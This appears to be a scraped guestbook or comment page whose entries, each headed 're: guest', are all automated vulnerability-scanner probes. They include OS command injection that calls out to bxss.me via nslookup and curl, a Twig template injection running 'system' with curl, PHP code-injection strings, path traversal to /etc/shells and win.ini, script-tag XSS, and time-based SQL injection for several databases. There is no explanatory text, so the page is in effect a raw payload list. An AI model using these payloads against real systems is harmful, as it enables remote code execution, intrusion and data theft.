".gethostbyname(lc("hitmx"."bjhrqsjh4ac96.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(77).chr(113).chr(71)."
re: guest
../../../../../../../../../../../../../../etc/shells
re: guest
|echo jrzltf$()\ bsofvn\nz^xyu||a #' |echo jrzltf$()\ bsofvn\nz^xyu||a #|" |echo jrzltf$()\ bsofvn\nz^xyu||a #
re: guest
gethostbyname(lc('hitqr'.'kfbzvmmec5b21.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(80).chr(110).chr(69)
re: guest
c:/windows/win.ini
re: guest
expr 9000524560 - 930499
re: guest
bxss.me
re: guest
(nslookup -q=cname hitrmwlslvtacee49b.bxss.me||curl hitrmwlslvtacee49b.bxss.me))
re: guest
Http://bxss.me/t/fit.txt
re: guest
$(nslookup -q=cname hithqzpxutago07cd9.bxss.me||curl hithqzpxutago07cd9.bxss.me)
re: guest
http://bxss.me/t/fit.txt?.jpg
re: guest
&nslookup -q=cname hitnalxnjrmvi5c8a9.bxss.me&'\"`0&nslookup -q=cname hitnalxnjrmvi5c8a9.bxss.me&`'
re: guest
ctime
sleep
p0
(I30
tp1
Rp2
.
re: guest
&(nslookup -q=cname hitklapzorbff2b711.bxss.me||curl hitklapzorbff2b711.bxss.me)&'\"`0&(nslookup -q=cname hitklapzorbff2b711.bxss.me||curl hitklapzorbff2b711.bxss.me)&`'
re: guest
|(nslookup -q=cname hithvfnvebsbn35f7b.bxss.me||curl hithvfnvebsbn35f7b.bxss.me)
re: guest
`(nslookup -q=cname hityzspmutpsm8044f.bxss.me||curl hityzspmutpsm8044f.bxss.me)`
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
'"()
re: guest
;(nslookup -q=cname hitociuzojkjob26a7.bxss.me||curl hitociuzojkjob26a7.bxss.me)|(nslookup -q=cname hitociuzojkjob26a7.bxss.me||curl hitociuzojkjob26a7.bxss.me)&(nslookup -q=cname hitociuzojkjob26a7.bxss.me||curl hitociuzojkjob26a7.bxss.me)
re: guest
';print(md5(31337));$a='
re: guest
'&&sleep(27*1000)*mqnyat&&'
re: guest
|(nslookup${IFS}-q${IFS}cname${IFS}hitznxbhjqggza577f.bxss.me||curl${IFS}hitznxbhjqggza577f.bxss.me)
re: guest
";print(md5(31337));$a="
re: guest
"&&sleep(27*1000)*yqdmri&&"
re: guest
&(nslookup${IFS}-q${IFS}cname${IFS}hitcsixzkdbdu1df60.bxss.me||curl${IFS}hitcsixzkdbdu1df60.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitcsixzkdbdu1df60.bxss.me||curl${IFS}hitcsixzkdbdu1df60.bxss.me)&`'
re: guest
${@print(md5(31337))}
re: guest
'||sleep(27*1000)*tahuhj||'
re: guest
${@print(md5(31337))}\
re: guest
"||sleep(27*1000)*vpllhv||"
re: guest
'.print(md5(31337)).'
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
bxss.me/t/xss.html?%00
re: guest
"+"A".concat(70-3).concat(22*4).concat(108).concat(75).concat(101).concat(70)+(require"socket"
Socket.gethostbyname("hitoc"+"sfoaypekb55ad.bxss.me.")[3].to_s)+"
re: guest
replies
re: guest
'+'A'.concat(70-3).concat(22*4).concat(103).concat(72).concat(113).concat(70)+(require'socket'
Socket.gethostbyname('hitmr'+'mtiwdrkp2dadd.bxss.me.')[3].to_s)+'
re: guest
replies�
re: guest
'A'.concat(70-3).concat(22*4).concat(108).concat(69).concat(105).concat(88)+(require'socket'
Socket.gethostbyname('hitkr'+'jegngfag62f41.bxss.me.')[3].to_s)
re: guest
replies/.
re: guest
'"
re: guest
<!--
re: guest
'"()&%<zzz><ScRiPt >1prg(9385)</ScRiPt>
re: guest
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitogbdcbvyjsbea41.bxss.me")}}
re: guest
'"()&%<zzz><ScRiPt >1prg(9834)</ScRiPt>
re: guest
9072190
re: guest
YbsryCVm
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
-1 OR 5*5=25 --
re: guest
-1 OR 5*5=26 --
re: guest
-1 OR 5*5=25
re: guest
-1 OR 5*5=26
re: guest
*if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
-1 waitfor delay '0:0:15' --
re: guest
Bt02vmTB'; waitfor delay '0:0:15' --
re: guest
-1 OR 981=(SELECT 981 FROM PG_SLEEP(15))--
re: guest
-1) OR 458=(SELECT 458 FROM PG_SLEEP(15))--
re: guest
-1)) OR 696=(SELECT 696 FROM PG_SLEEP(15))--
re: guest
gAryZ0Sr' OR 123=(SELECT 123 FROM PG_SLEEP(15))--
re: guest
KkxQ8G8V') OR 445=(SELECT 445 FROM PG_SLEEP(15))--
re: guest
uFeBoWCD')) OR 300=(SELECT 300 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
'"
re: guest
@@glN0c
re: guest
(select 198766*667891)
re: guest
(select 198766*667891 from DUAL)